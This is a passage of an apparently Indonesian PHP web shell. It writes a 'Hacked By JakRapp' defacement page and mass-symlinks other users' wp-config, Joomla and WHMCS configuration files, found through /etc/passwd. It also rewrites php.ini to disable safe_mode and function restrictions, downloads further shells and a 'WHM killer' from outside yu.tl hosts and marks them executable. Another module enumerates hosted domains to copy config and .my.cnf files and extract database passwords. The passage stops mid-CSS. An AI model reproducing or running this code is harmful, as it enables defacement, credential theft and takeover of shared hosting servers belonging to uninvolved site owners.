32%35%25%33%33%25%34%34%25%32%35%25%33%32%25%33%32%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%34%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%34%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%34%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%32%25%32%35%25%33%33%25%34%35%25%32%35%25%33%30%25%34%31%25%32%37%25%32%39%25%32%39%25%33%42%25%30%41%25%32%46%25%32%46%25%32%44%25%32%44%25%33%45%25%30%41%25%33%43%25%32%46%25%35%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%27%29%29%3B%0A%2F%2F%2D%2D%3E%0A%3C%2F%53%63%72%69%70%74%3E'));
  1190. //-->
  1191. </Script>
  1192. <p>
  1193. <p>
  1194. <br>
  1195. <b><font color='blue' face='consolas' size='4'>
  1196. <p align='center' class='style2'><font face='Trajan Pro' size='10' color='Green' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='yellow'>Hacked By JakRapp</font><p>
  1197. <font color='blue' face='consolas' size='4'>
  1198. <p align='center' class='style2'><font face='Trajan Pro' size='4' color='Green' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b>./Jaka_Attacker ~ UstadzJaka ~ ./Zonkk ~ Jack D'Ripper ~ ./KLEMEZ<p></font>
  1199. <font color='blue' face='consolas' size='4'>
  1200. <center><p align='center' class='style2'><font face='Trajan Pro' size='4' color='RED' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='WHITE'>
  1201. -=[[ Pasukan Berani Mati REBORN ]]=-<P>-=| GRETZ IDBTE4M | GOENK TEA | ./HDV | ADRIAN XDA | DIDOT | POETRA D`M | JACK D`RIPPER | DAY IDBTE4M | DIMAZ BN |=- <P>
  1202. -=| DEMONK | KHUNAY | MR-AQ | HENDRA D`N | PETAPA GENIT | KODRAT | MUZZAM | MAULANA | SIRIN |=-
  1203. </font><p></center>
  1204. <center><table width='100%' border='2'><tr><td width='10%' align='center'><blink><font Class-'glow' color='white'><code>My Friends : </code></font></blink></td><td width='90%'><font color='yellow' size='4'><marquee><code> Kefiex404 ~ FadliDotID_007 ~ ./elro-BN404 ~ k3c0t ~ RT05 ~ 4Z1S ~ Mr.Optimuz_r00t ~ Anzhi72 ~ NyengatGetar ~ CaFc_Br40ck ~ Hmei7 ~ ./S3mR4k4T ~ Mr.AchanX48 ~ ./Na-z ~ ./Ghost-Priox ~ Mr.Hari ~ 1n51d3r ~ M0NST3R-P1NK ~ LDera ~ nemat0da ~ b0L4ng ~ HYTHAN7 ~ M0NST3R-P1NK ~ AldiDotPhp ~ USTADCAGE_48</code></marquee></font></td></tr></table><html><center>
  1205.  
  1206. <embed src='http://www.youtube.com/v/oWqWNMNFZlU&autoplay=1' type='application/x-shockwave-flash' wmode='transparent' width='1' height='1'></embed>
  1207. </body>
  1208. </html>
  1209.  
  1210. ";
  1211. $f =@fopen ('index.phtml','w');
  1212. fwrite($f , $htcs);
  1213. $pg = basename(__FILE__);
  1214.  
  1215. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  1216. $u = explode("/",$pageURL );
  1217. $pageURL =str_replace($u[count($u)-1],"",$pageURL );
  1218.  
  1219. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
  1220. $u = explode("/",$pageFTP );
  1221. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
  1222. ?>
  1223.  
  1224. <?php
  1225. if (isset($_GET['jak']) && ($_GET['jak'] == 'config')) {
  1226. ?>
  1227. <form action="?&amp;jak=config" method="post">
  1228. <?php @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  1229. echo '<form method="POST"><textarea cols="30" name="passwd"  rows="10">'; $uSr=file("/etc/passwd"); foreach($uSr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
  1230. </textarea><br>Your Folder Config Name : <input type="text" class="input" name="folfig" size=40 />
  1231. <select class="inp"  title="Select Your Type File"  name="type" size=""><option title="type txt" value=".txt">.txt</option><option title="type php" value=".php">.php</option><option title="type shtml" value=".shtml">.shtml</option><option title="type ini" value=".ini">.ini</option></select>
  1232. <input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>
  1233. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  1234. if ($_POST['conf']) {
  1235. $folfig = $_POST['folfig']; $type = $_POST['type'];
  1236. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<blink>Maaf Bosq fitur Symlink masih di disabled :( </blink>');}
  1237. @mkdir($folfig, 0755);
  1238. @chdir($folfig);
  1239. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex jak.phtml\nAddType txt .php\nAddHandler txt .php";
  1240. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  1241. $passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya bosq ...</center></blink>";
  1242. foreach($passwd as $pwd){ $user=trim($pwd);
  1243. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'~~>wordpress'.$type.'');
  1244. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'~~>wordpress-wp'.$type.'');
  1245. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'~~>wordpress-wp-beta'.$type.'');
  1246. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'~~>wordpress-beta'.$type.'');
  1247. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'~~>wp13-press'.$type.'');
  1248. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'~~>wordpress-wordpress'.$type.'');
  1249. @symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'~~>wordpress-wordpress-beta'.$type.'');
  1250. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'~~>wordpress-news'.$type.'');
  1251. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'~~>wordpress-new'.$type.'');
  1252. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'~~>wordpress'.$type.'');
  1253. @symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'~~>wordpress-web'.$type.'');
  1254. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'~~>wordpress-blogs'.$type.'');
  1255. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'~~>wordpress-home'.$type.'');
  1256. @symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'~~>wordpress-protal'.$type.'');
  1257. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'~~>ordpress-site'.$type.'');
  1258. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'~~>wordpress-main'.$type.'');
  1259. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'~~>wordpress-test'.$type.'');
  1260. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'~~>joomla'.$type.'');
  1261. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'~~>joomla'.$type.'');
  1262. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
  1263. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'~~>joomla-joomla'.$type.'');
  1264. @symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'~~>joomla-protal'.$type.'');
  1265. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'~~>joomla-joo'.$type.'');
  1266. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'~~>joomla-cms'.$type.'');
  1267. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'~~>joomla-site'.$type.'');
  1268. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'~~>joomla-main'.$type.'');
  1269. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'~~>joomla-news'.$type.'');
  1270. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'~~>joomla-new'.$type.'');
  1271. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
  1272. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'~~>Vbulletin-forum'.$type.'');
  1273. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'~~>vbluttin'.$type.'');
  1274. @symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$user.'~~>vbluttin3'.$type.'');
  1275. @symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$user.'~~>vbluttin-class_core.php'.$type.'');
  1276. @symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$user.'~~>vbluttin-class_core.php1'.$type.'');
  1277. @symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$user.'~~>vbluttin-class_core.php2'.$type.'');
  1278. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'~~>vb1-config'.$type.'');
  1279. @symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$user.'~~>cpanel'.$type.'');
  1280. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'~~>panel'.$type.'');
  1281. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'~~>host'.$type.'');
  1282. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'~~>hosting'.$type.'');
  1283. @symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.'~~>hosts'.$type.'');
  1284. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'~~>zencart'.$type.'');
  1285. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'~~>zencart-shop'.$type.'');
  1286. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'~~>hop-ZCshop'.$type.'');
  1287. @symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'~~>mk-portale1'.$type.'');
  1288. @symlink('/home/'.$user.'/public_html/Settings.php',$user.'~~>smf'.$type.'');
  1289. @symlink('/home/'.$user.'/public_html/smf/Settings.php',$user.'~~>smf-smf'.$type.'');
  1290. @symlink('/home/'.$user.'/public_html/forum/Settings.php',$user.'~~>smf-forum'.$type.'');
  1291. @symlink('/home/'.$user.'/public_html/forums/Settings.php',$user.'~~>smf-forums'.$type.'');
  1292. @symlink('/home/'.$user.'/public_html/upload/includes/config.php',$user.'~~>upload'.$type.'');
  1293. @symlink('/home/'.$user.'/public_html/incl/config.php',$user.'~~>malay'.$type.'');
  1294. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'~~>clents'.$type.'');
  1295. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'~~>client2'.$type.'');
  1296. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'~~>client'.$type.'');
  1297. @symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'~~>lokomedia'.$type.'');
  1298. @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'~~>webconfig'.$type.'');
  1299. @symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'~~>webconfig2'.$type.'');
  1300. @symlink('/home/'.$user.'/public_html/system/sistem.php',$user.'~~>lokomedia1'.$type.'');
  1301. @symlink('/home/'.$user.'/public_html/sites/default/settings.php',$user.'~~>Drupal'.$type.'');
  1302. @symlink('/home/'.$user.'/public_html/e107_config.php',$user.'~~>e107'.$type.'');
  1303. @symlink('/home/'.$user.'/public_html/datas/config.php',$user.'~~>Seditio'.$type.'');
  1304. @symlink('/home/'.$user.'/public_html/article/config.php',$user.'~~>Nwahy'.$type.'');
  1305. @symlink('/home/'.$user.'/public_html/connect.php',$user.'~~>PHP-Fusion'.$type.'');
  1306. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'~~>traidnt1'.$type.'');
  1307. @symlink('/home/'.$user.'/public_html/config.php',$user.'~~>4images'.$type.'');
  1308. @symlink('/home/'.$user.'/public_html/member/configuration.php',$user.'~~>1member'.$type.'') ;
  1309. @symlink('/home/'.$user.'/public_html/requires/config.php',$user.'~~>AM4SS-hosting'.$type.'');
  1310. @symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$user.'~~>hostbills-supports'.$type.'');
  1311. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'~~>hostbills-client'.$type.'');
  1312. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'~~>hostbills-support'.$type.'');
  1313. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'~~>hostbills-billing'.$type.'');
  1314. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'~~>hostbills-billings'.$type.'');
  1315. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'~~>hostbills-host'.$type.'');
  1316. @symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$user.'~~>hostbills-hosts'.$type.'');
  1317. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'~~>hostbills-hosting'.$type.'');
  1318. @symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$user.'~~>hostbills-hostings'.$type.'');
  1319. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'~~>hostbills'.$type.'');
  1320. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'~~>hostbills-hostbills'.$type.'');
  1321. @symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$user.'~~>hostbills-hostbill'.$type.'');
  1322. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'~~>billing'.$type.'');
  1323. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'~~>whm-manage'.$type.'');
  1324. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'~~>whm-my'.$type.'');
  1325. @symlink('/home/'.$user.'/public_html/myshop/configuration.php',$user.'~~>whm-myshop'.$type.'');
  1326. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'~~>sucure-whm'.$type.'');
  1327. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'~~>sucure-whmcs'.$type.'');
  1328. }
  1329. echo 'Selesai mas/mba bro untuk melihat hasilnya klik ~~> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';
  1330. }
  1331. }
  1332. ?>
  1333. <?php
  1334. if (isset($_GET['jak']) && ($_GET['jak'] == 'auto')) {
  1335. ?>
  1336. <form action="?&amp;jak=auto" method="post">
  1337. <?php
  1338. echo "<html><head><title>MATAMU PICEK !!!!</title>";
  1339. echo "<body bgcolor='black'>";
  1340. echo "<font color='yellow'><center>-=[ IDBTE4M ]=- -=[ HGL10]=- -=[ BN ]=-</center></font><br/><br/><form method='POST'>";
  1341. echo "<div align='center'>";
  1342. echo "<input type='submit' name='jak' value='IJIN SERVER'><br/> <br/>";
  1343. echo "</div>";
  1344. echo "<div align='center'>";
  1345. echo "<input type='submit' name='te4m' value='-=[ HsH ]=-'> ";
  1346. echo "<input type='submit' name='te4m1' value='-=[ AUTO ]=-'> ";
  1347. echo "<input type='submit' name='te4m2' value='-=[ WHM KILL ]=-'> ";
  1348. echo "<input type='submit' name='te4m3' value='-=[ DM SHELL ]=-'> ";
  1349. echo "<input type='submit' name='te4m4' value='-=[ BN CGI ]=-'></p> ";
  1350. echo "<input type='submit' name='te4m5' value='-=[ SABUN ]=-'></p> ";
  1351. echo "<input type='submit' name='te4m6' value='-=[ WHMCS KILL ]=-'></p> ";
  1352. echo "</div>";
  1353.  
  1354.  
  1355. $sh = 'file_get_contents';
  1356.  
  1357. if($_POST['jak']) {
  1358. $ini = "php.ini";
  1359. $open = fopen($ini, 'w');
  1360. $source = ("safe_mode = OFF n
  1361. disable_functions = NONE n
  1362. safe_mode_gid = OFF n
  1363. open_basedir = OFF n
  1364. register_globals = ON n
  1365. exec = ON n
  1366. shell_exec = ON n");
  1367. fwrite($open, $source);
  1368. echo "<font color='lime'>";
  1369. if($open) {
  1370. echo '<hr><p>ijin diterima, silahkan pilih tools sesuai keinginan :) </p>';
  1371. }
  1372. else {
  1373. echo "<font color='red'>";
  1374. echo '<hr><p>GAGAL kang </p>';
  1375. echo "</font>";
  1376. fclose($open);
  1377. } }
  1378.  
  1379. if($_POST['te4m']) {
  1380. $cgi = 'http://el-ro.yu.tl/files/in.zip';
  1381. $get11 = $sh($cgi);
  1382. $idbk = fopen('hsh.php', 'w');
  1383. fwrite($idbk,$get11);
  1384. fclose($idbk);
  1385. {
  1386. @chmod('hsh.php',0755);
  1387. }
  1388. echo "<font color='aqua'>";
  1389. echo "<hr>shell hsh sukses dibuat :D <br/>
  1390. Silahkan kunjungi http://alamat-domain-kamu/hsh.php atau lihat hasilnya <a href='hsh.php' target='_blank'>DISINI</a></center></br>";
  1391. echo "</font>";
  1392. }
  1393. echo "</font>";
  1394.  
  1395. if($_POST['te4m1']) {
  1396. $cgi = 'http://kefiex.yu.tl/files/ma.zip';
  1397. $get11 = $sh($cgi);
  1398. $idbk = fopen('ma.php', 'w');
  1399. fwrite($idbk,$get11);
  1400. fclose($idbk);
  1401. {
  1402. @chmod('ma.php',0755);
  1403. }
  1404. echo "<font color='aqua'>";
  1405. echo "<hr>tools sukses dibuat :D <br/>
  1406. Silahkan kunjungi http://alamat-domain-kamu/info.php atau lihat hasilnya <a href='ma.php' target='_blank'>DISINI</a></center></br>";
  1407. echo "</font>";
  1408. }
  1409. echo "</font>";
  1410.  
  1411. if($_POST['te4m2']) {
  1412. $cgi = 'http://el-ro.yu.tl/files/whm.zip';
  1413. $get11 = $sh($cgi);
  1414. $idbk = fopen('whm.php', 'w');
  1415. fwrite($idbk,$get11);
  1416. fclose($idbk);
  1417. {
  1418. @chmod('whm.php',0755);
  1419. }
  1420. echo "<font color='aqua'>";
  1421. echo "<hr>whm killer sukses dibuat :D <br/>
  1422. Silahkan kunjungi http://alamat-domain-kamu/whm.php atau lihat hasilnya <a href='whm.php' target='_blank'>DISINI</a></center></br>";
  1423. echo "</font>";
  1424. }
  1425. echo "</font>";
  1426.  
  1427. if($_POST['te4m3']) {
  1428. $cgi = 'http://el-ro.yu.tl/files/dm.zip';
  1429. $get11 = $sh($cgi);
  1430. $idbk = fopen('links.php', 'w');
  1431. fwrite($idbk,$get11);
  1432. fclose($idbk);
  1433. {
  1434. @chmod('links.php',0755);
  1435. }
  1436. echo "<font color='aqua'>";
  1437. echo "<hr>shell DM sukses dibuat :D <br/>
  1438. Silahkan kunjungi http://alamat-domain-kamu/links.php atau lihat hasilnya <a href='links.php' target='_blank'>DISINI</a></center></br>";
  1439. echo "</font>";
  1440. }
  1441. echo "</font>";
  1442. if($_POST['te4m5']) {
  1443. $cgi = 'http://kefiex.yu.tl/files/sabun.zip';
  1444. $get11 = $sh($cgi);
  1445. $idbk = fopen('sabun.php', 'w');
  1446. fwrite($idbk,$get11);
  1447. fclose($idbk);
  1448. {
  1449. @chmod('sabun.php',0755);
  1450. }
  1451. echo "<font color='aqua'>";
  1452. echo "<hr>sabun massal :D <br/>
  1453. Silahkan kunjungi http://alamat-domain-kamu/sabun.php atau lihat hasilnya <a href='sabun.php' target='_blank'>DISINI</a></center></br>";
  1454. echo "</font>";
  1455. }
  1456. echo "</font>";
  1457. if($_POST['te4m6']) {
  1458. $cgi = 'http://kefiex.yu.tl/files/olenk.zip';
  1459. $get11 = $sh($cgi);
  1460. $idbk = fopen('bn.php', 'w');
  1461. fwrite($idbk,$get11);
  1462. fclose($idbk);
  1463. {
  1464. @chmod('bn.php',0755);
  1465. }
  1466. echo "<font color='aqua'>";
  1467. echo "<hr>config kill :D <br/>
  1468. Silahkan kunjungi http://alamat-domain-kamu/bn.php atau lihat hasilnya <a href='bn.php' target='_blank'>DISINI</a></center></br>";
  1469. echo "</font>";
  1470. }
  1471. echo "</font>";
  1472. if($_POST['te4m4']) {
  1473. $cgi = 'http://kefiex.yu.tl/files/isis.zip';
  1474. $get11 = $sh($cgi);
  1475. $idb1k = fopen('idb2.php', 'w');
  1476. fwrite($idb1k,$get11);
  1477. fclose($idb1k);
  1478. {
  1479. @chmod('idb2.php',0755);
  1480. }
  1481. echo "<font color='aqua'>";
  1482. echo "<hr>CGIProxy sukses dibuat :D <br/>
  1483. Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='idb2.php' target='_blank'>DISINI</a></center></br>";
  1484. echo "</font>";
  1485. }
  1486. echo "</font>";
  1487. }
  1488. ?>
  1489.  
  1490. <?php
  1491. if (isset($_GET['jak']) && ($_GET['jak'] == 'wp2')) { ?>
  1492. <form action="?jak=wp2" method="post">
  1493. <?php
  1494. @ini_set('display_errors',0);
  1495. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  1496.     $ar0=explode($marqueurDebutLien, $text);
  1497.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  1498.     return trim($ar1[0]);
  1499. }
  1500.  
  1501. echo "<center>";
  1502. $d0mains = @file('/etc/named.conf');
  1503. $domains = scandir("/var/named");
  1504.  
  1505. if ($domains or $d0mains)
  1506. {
  1507.     $domains = scandir("/var/named");
  1508.     if($domains) {
  1509. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> wp-config </th></tr>";
  1510. $count=1;
  1511. $dc = 0;
  1512. $list = scandir("/var/named");
  1513. foreach($list as $domain){
  1514. if(strpos($domain,".db")){
  1515. $domain = str_replace('.db','',$domain);
  1516. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1517. $dirz = '/home/'.$owner['name'].'/public_html/wp-config.php';
  1518. $path = getcwd();
  1519.  
  1520. if (is_readable($dirz)) {
  1521. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  1522. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  1523. $password=entre2v2($p,'password="','"');
  1524. echo "<tr><td>".$count++."</td><td><a href='http://".$domain."/wp-login.php' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
  1525. $dc++;
  1526. }
  1527.  
  1528. }
  1529. }
  1530. echo '</table>';
  1531. $total = $dc;
  1532. echo '<br><div class="result">Wp config Found = '.$total.'</h3><br />';
  1533. echo '</center>';
  1534. }else{
  1535. $d0mains = @file('/etc/named.conf');
  1536.     if($d0mains) {
  1537. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> wp-config </th></tr>";
  1538. $count=1;
  1539. $dc = 0;
  1540. $mck = array();
  1541. foreach($d0mains as $d0main){
  1542.     if(@eregi('zone',$d0main)){
  1543.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1544.         flush();
  1545.         if(strlen(trim($domain[1][0])) >2){
  1546.             $mck[] = $domain[1][0];
  1547.         }
  1548.     }
  1549. }
  1550. $mck = array_unique($mck);
  1551. $usr = array();
  1552. $dmn = array();
  1553. foreach($mck as $o) {
  1554.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1555.     $usr[] = $infos['name'];
  1556.     $dmn[] = $o;
  1557. }
  1558. array_multisort($usr,$dmn);
  1559. $dt = file('/etc/passwd');
  1560. $passwd = array();
  1561. foreach($dt as $d) {
  1562.     $r = explode(':',$d);
  1563.     if(strpos($r[5],'home')) {
  1564.         $passwd[$r[0]] = $r[5];
  1565.     }
  1566. }
  1567. $l=0;
  1568. $j=1;
  1569. foreach($usr as $r) {
  1570. $dirz = '/home/'.$r.'/public_html/wp-config.php';
  1571. $path = getcwd();
  1572. if (is_readable($dirz)) {
  1573. copy($dirz, ''.$path.'/'.$r.'.txt');
  1574. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  1575. $password=entre2v2($p,'password="','"');
  1576. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  1577. $dc++;
  1578.                 flush();
  1579.                 $l=$l?0:1;
  1580.                 $j++;
  1581.                                 }
  1582.             }
  1583.                         }
  1584. echo '</table>';
  1585. $total = $dc;
  1586. echo '<br><div class="result">Total config Found = '.$total.'</h3><br />';
  1587. echo '</center>';
  1588.  
  1589. }
  1590. }else{
  1591. echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
  1592. }
  1593. echo "<center>";
  1594. $d0mains = @file('/etc/named.conf');
  1595. $domains = scandir("/var/named");
  1596.  
  1597. if ($domains or $d0mains)
  1598. {
  1599.     $domains = scandir("/var/named");
  1600.     if($domains) {
  1601. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> config </th></tr>";
  1602. $count=1;
  1603. $dc = 0;
  1604. $list = scandir("/var/named");
  1605. foreach($list as $domain){
  1606. if(strpos($domain,".db")){
  1607. $domain = str_replace('.db','',$domain);
  1608. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1609. $dirz = '/home/'.$owner['name'].'/public_html/configuration.php';
  1610. $path = getcwd();
  1611.  
  1612. if (is_readable($dirz)) {
  1613. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  1614. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  1615. $password=entre2v2($p,'password="','"');
  1616. echo "<tr><td>".$count++."</td><td><a href='http://".$domain."/wp-login.php' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
  1617. $dc++;
  1618. }
  1619.  
  1620. }
  1621. }
  1622. echo '</table>';
  1623. $total = $dc;
  1624. echo '<br><div class="result">Total config Found = '.$total.'</h3><br />';
  1625. echo '</center>';
  1626. }else{
  1627. $d0mains = @file('/etc/named.conf');
  1628.     if($d0mains) {
  1629. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> config </th></tr>";
  1630. $count=1;
  1631. $dc = 0;
  1632. $mck = array();
  1633. foreach($d0mains as $d0main){
  1634.     if(@eregi('zone',$d0main)){
  1635.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1636.         flush();
  1637.         if(strlen(trim($domain[1][0])) >2){
  1638.             $mck[] = $domain[1][0];
  1639.         }
  1640.     }
  1641. }
  1642. $mck = array_unique($mck);
  1643. $usr = array();
  1644. $dmn = array();
  1645. foreach($mck as $o) {
  1646.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1647.     $usr[] = $infos['name'];
  1648.     $dmn[] = $o;
  1649. }
  1650. array_multisort($usr,$dmn);
  1651. $dt = file('/etc/passwd');
  1652. $passwd = array();
  1653. foreach($dt as $d) {
  1654.     $r = explode(':',$d);
  1655.     if(strpos($r[5],'home')) {
  1656.         $passwd[$r[0]] = $r[5];
  1657.     }
  1658. }
  1659. $l=0;
  1660. $j=1;
  1661. foreach($usr as $r) {
  1662. $dirz = '/home/'.$r.'/.my.cnf';
  1663. $path = getcwd();
  1664. if (is_readable($dirz)) {
  1665. copy($dirz, ''.$path.'/'.$r.'.txt');
  1666. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  1667. $password=entre2v2($p,'password="','"');
  1668. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  1669. $dc++;
  1670.                 flush();
  1671.                 $l=$l?0:1;
  1672.                 $j++;
  1673.                                 }
  1674.             }
  1675.                         }
  1676. echo '</table>';
  1677. $total = $dc;
  1678. echo '<br><div class="result">Total cp = '.$total.'</h3><br />';
  1679. echo '</center>';
  1680.  
  1681. }
  1682. }else{
  1683. echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
  1684. }
  1685.  
  1686. echo "<br>&#169; <font color='#FF0000'>./elro-BN404</font> | BN-IDBTE4M";
  1687. echo "</body></html>";
  1688. }
  1689. ?>
  1690. <?php
  1691. if (isset($_GET['jak']) && ($_GET['jak'] == 'wpmas')) { ?>
  1692. <form action="?jak=wpmas" method="post">
  1693. <style>
  1694. body
  1695. {
  1696.         background: #0f0e0d;
  1697.         color: #FF9933;
  1698.         padding: 0px;
  1699. }
  1700. a:link, body_alink
  1701. {
  1702.         color: #FF9933;
  1703.         text-decoration: none;
  1704. }
  1705. a:visited, body_avisited
  1706. {
  1707.         color: #FF9933;
  1708.         text-decoration: none;
  1709. }
  1710. a:hover, a:active, body_ahover
  1711. {
  1712.         color: #FFFFFF;
  1713.         text-decoration: none;
  1714. }
  1715. td, th, p, li,table
  1716. {
  1717.        
  1718.         background: #2e2b28;
  1719.         border:1px solid #524f46;
  1720. }
  1721. input
  1722. {
  1723.         border: 1px solid;
  1724.         cursor: default;
  1725.        
  1726.         overflow: hidden;
  1727.         background: #2e2b28;
  1728.         color: #ffffff;
  1729. }textarea
  1730. {
  1731.         border: 1px solid;
  1732.         cursor: default;
  1733.        
  1734.         overflow: hidden;
  1735.         background: #2e2b28;
  1736.         color: #ffffff;
  1737. }
  1738. button
  1739. {
  1740.         border: 1px solid;
